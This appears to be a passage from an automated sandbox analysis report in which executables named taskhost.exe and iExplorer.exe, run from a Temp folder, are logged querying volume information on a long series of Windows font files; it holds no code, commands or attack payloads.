                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
